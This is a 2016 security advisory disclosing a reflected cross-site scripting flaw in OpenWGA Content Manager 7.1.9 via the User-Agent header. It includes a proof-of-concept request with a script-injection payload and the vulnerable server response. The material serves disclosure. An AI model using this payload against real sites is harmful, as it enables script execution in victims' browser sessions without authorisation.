OpenWGA Content Manager 7.1.9 User-Agent HTTP Header XSS Vulnerability
Vendor: Innovation Gate GmbH
Product web page: https://www.openwga.com
Affected version: OpenWGA Content Manager 7.1.9 (Build 230)
OpenWGA Admin Client 7.1.7 (Build 82)
OpenWGA Server 7.1.9 Maintenance Release (Build 642)
Summary: OpenWGA is an advanced open source java based enterprise CMS
platform featuring real WYSIWYG, a state of the art CMS IDE and more.
Desc: OpenWGA suffers from a cross-site scripting vulnerability when
input passed via the User-Agent HTTP header is not properly sanitized
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.
Tested on: Apache/2.2.14 (Ubuntu)
Apache Tomcat/6.0.41
Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5316
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5316.php
23.02.2016
--
Request:
--------
GET /plugin-contentmanager HTTP/1.1
Host: localhost:8080
Accept: */*
Accept-Language: en
User-Agent: <script>alert(1)</script>
Connection: close
Response:
---------
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WGLastRedirectHex=; Path=/; Max-Age=0; HttpOnly
Pragma: No-Cache
Cache-Control: No-Cache
Content-Type: text/html;charset=UTF-8
Date: Tue, 23 Feb 2016 14:02:49 GMT
Connection: close
Content-Length: 1902
<html>
<head>
<title>browser not supported: OpenWGA™ Content Manager Version 7.1.9 Build 230</title>
<meta name="generator" content="OpenWGA... Server 7 'Wolf' Platform">
<span style="font-weight:bold"><script>alert(1)</script></span>
---